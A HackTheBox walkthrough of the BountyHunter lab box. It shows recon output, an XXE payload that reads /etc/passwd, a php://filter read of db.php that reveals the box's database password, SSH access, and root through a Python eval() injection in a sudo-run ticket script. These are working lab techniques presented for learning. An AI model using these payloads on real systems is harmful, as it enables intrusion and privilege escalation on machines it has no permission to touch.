BountyHunter WalkThrough — HackTheBox

Adham A. Makroum
5 min readFeb 15, 2022

Hey my friends, I’m Adham Makroum aka 0xmkr24, Today I’ll root BountyHunter Box which is retired today, try to simplify it for you and i wish this write-up be useful for you

Now let’s Start Hacking!

Nmap Scanning

# sudo  nmap -sV -sS -T4 -A -Pn -p1-65535 -oN nmap.txt
Nmap scan report for
Host is up (0.29s latency).
Not shown: 65533 closed ports
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
| 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
No exact OS matches for host (If you know what OS is running on it, see <> ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
1 503.45 ms
2 332.34 ms

OS and Service detection performed. Please report any incorrect results at <> .
Nmap done: 1 IP address (1 host up) scanned in 1278.13 seconds

We have 2 ports opens

  • Port 22: running OpenSSH 8.2p1
  • Port 80: running Apache httpd 2.4.41


Visit the application

Check from portal

it provides us another page

it’s interesting form but let us run gobuster then will return to it


┌──(kali㉿0xmkr24)-[~/Desktop/HTB/BugBounty] └─$ gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -x php,html,txt  =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url:   [+] Threads:        10 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt [+] Status codes:   200,204,301,302,307,401,403 [+] User Agent:     gobuster/3.0.1 [+] Extensions:     html,txt,php [+] Timeout:        10s =============================================================== 2021/09/02 11:09:32 Starting gobuster =============================================================== /.hta (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.hta.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/assets (Status: 301)
/css (Status: 301)
/db.php (Status: 200)
/index.php (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/portal.php (Status: 200)
/resources (Status: 301)
/server-status (Status: 403) =============================================================== 2021/09/02 11:19:56 Finished ===============================================================

We have interesting directories

  • /db.php
  • /resources

I visited db.php but found nothing so let’s visit resources.php

let’s see what’s in README.txt

let us return to portal and open burp then enable intercept

the data are sent as encoded so let us try to decrypt it

Base64 then URL encode

I searched for XML v1.0 vulnerabilities and found out it was XXE vulnerability but I hadn’t learned about it yet so I decided to read about it from owasp and portwigger then solve some labs to be more understanding of this vulnerability and see how can i exploit it

Then I searched for payloads to exploit it and you can found some useful payloads here

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]> <bugreport>

now replace it in data parameter and encode it with URL encoding by ctrl + u

there is development user

now we need a password to connect with ssh

let us try to open db.php

i used this payload

php://filter : allow the attacker to include local file and base64 encode as the output

we got encoded data so let us decode it

// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";

now try this password with development user to connect with ssh

ssh development@

Bingo we get a user.txt

Privilege Escalation

this is a time to take full access on this box

try sudo -l to see what are our privileges

there’s a script we can execute and get a root, so let us see what is in it

I copy all lines and run it on vs code to debug it and understand how is it work, So let me explain to you what I understood

there is an eval() function, it can be used to achieve authentication bypass and even code injection.

The eval() function in Python takes strings and execute them as code. For example, eval(‘1+1’) would return 2.

for more information about it and other dangerous functions, how can you exploit it to execute arbitrary code on the system you can read this writeup.

After understanding a script what are we need?

We nead a file with .md extention
fitst line start with “# Skytrain Inc”
second line start with “## Ticket to “
third line start with “__Ticket Code:__”
fourth line start with “**” and a number divided by 7 like 704

I created

# Skytrain Inc 
## Ticket to
__Ticket Code:__
**704+ __import__('os').system('/bin/bash')

now run our script with sudo

and congrats we became a roooooot!!!

Thanks for reading, I hope my write-up was useful for you. Feel free to connect with me on Twitter or Linkedin.